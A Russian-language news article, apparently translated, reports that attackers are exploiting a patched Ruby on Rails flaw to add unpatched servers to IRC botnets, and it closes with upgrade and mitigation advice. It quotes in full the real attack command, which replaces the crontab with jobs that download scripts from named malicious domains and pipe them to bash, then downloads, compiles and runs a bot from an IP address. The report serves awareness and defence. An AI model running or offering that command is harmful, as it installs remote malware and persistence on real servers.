Уязвимость в RoR, зараженные сервера используются в ботнетах

в 14:08, , рубрики: exploit, irc ботнет, ROR, ruby on rails, ботнет, информационная безопасность, эксплоит

Уязвимость в RoR, зараженные сервера используются в ботнетах

Злоумышленники используют критическую уязвимость в Ruby on Rails для того чтобы получить доступ на сервера и сделать их частью ботнета. Сайт Arstechnica.com впервые сообщил об этой угрозе в начале января, вскоре после того как был выпущен патч для уязвимости. Ars предупредил тогда, что уязвимость дает нападавшим возможность удаленно выполнить вредоносный код на сервере.
Но несмотря на это, многие администраторы серверов до сих пор не установили патч, выпущенный более четырех месяцев назад.


«Серверы, которые были атакованы, использовали зараженное программное обеспечение, которое добавило их к IRC каналам по крайней мере одного из двух серверов», сообщил исследователь безопасности Jeff Jarmoc во вторник на своем личном сайте.
Злоумышленники могут заставить серверы загрузить и выполнить вредоносный код и присоединиться к новым каналам IRC.

При этом каналы не требуют аутентификации, что делает возможным для конкурирующих злоумышленников проникнуть в чаты и ​​взять под контроль взломанные сервера.

Ботнеты, основанные на IRC сетях возвращают нас в прежние времена компьютерных преступлений, потому что они делают взлом легко доступным для «чайников» или относительно неквалифицированных хакеров, позволяющий контролировать огромное количество зараженных машин, используя несколько предварительно запрограммированных команд.

«Короче говоря, это довольно простой эксплоит, который был широко известен, и о котором предупреждали в течение нескольких месяцев», написал Джеф.

В своем сообщении Джеф не сказал, сколько серверов было заражено ботом, в твиттере же он сообщил что взломанные сервера сейчас отключены.
Атаки были совершены на различные сервера по всему интернету, о чем свидетельствуют сообщения здесь, здесь, и здесь.

По словам Джефа, атака происходит благодаря следующей команде:

crontab -r; echo "1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Это строка добавляет в крон команду, которая загружает и выполняет файлы. На момент написания этой статьи, это уже не доступно. Эти домены ранее были связаны с вирусной активностью. Далее, он загружает исходный файл на C под названием «k.c» в /tmp, компилирует его, используя GCC системы, и выполняет его. Наконец, он загружает и выполняет предварительно скомпилированные версии файла «k», предположительно в случае если компиляция завершится неудачно. На момент написания статьи источник с k.c еще доступен. Этот файл выполняется с именем ' – bash' которая будет отображаться в процессах. Программа устанавливает IRC бота, который подключается к cvv4you.ru (в настоящее время 188.190.124.81) или IP 188.190.124.120 и присоединяется к каналу #rails. Ни один ключ не используется, Хоть код и поддерживает это. Сценарий использует сформированный случайным образом 9-символьный ник при подключении к IRC. Файл блокировки '/tmp/tan.pid' обеспечивает выполнение кода только один раз на зараженном хосте.

Если вы работаете с Ruby on Rails убедитесь, что у вас установлена одна из версий: 3.2.11, 3.1.10, 3.0.19, 2.3.15 или более поздние, так как они не подвержены атаке. Те, кто не может обновиться прямо сейчас, могут предотвратить атаку, выключив XML или YAML и символьную конвертацию в XML парсере. Код, который делает это можно взять тут.

Подобные атаки являются признаком растущей уязвимости серверов, используемых для веб-сайтов и других масштабных задач.
За последние несколько месяцев, множество атак позволили получить дистанционное управление Apache, наиболее широко используемого веб-сервера.
Три недели назад, атакующими также были скомпрометированы Nginx и Lighttpd.
Исследователи до сих пор не знают, как злоумышленники сделали это. Но при этом причина успешных атак на Ruby on Rails сервера ясна, и эксплоиты легко блокировать, но только если админы готовы потратить несколько минут, чтобы решить это.

Найденные ошибки перевода, опечатки, пожалуйста, присылайте в лс.

Автор: LANC

Источник

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js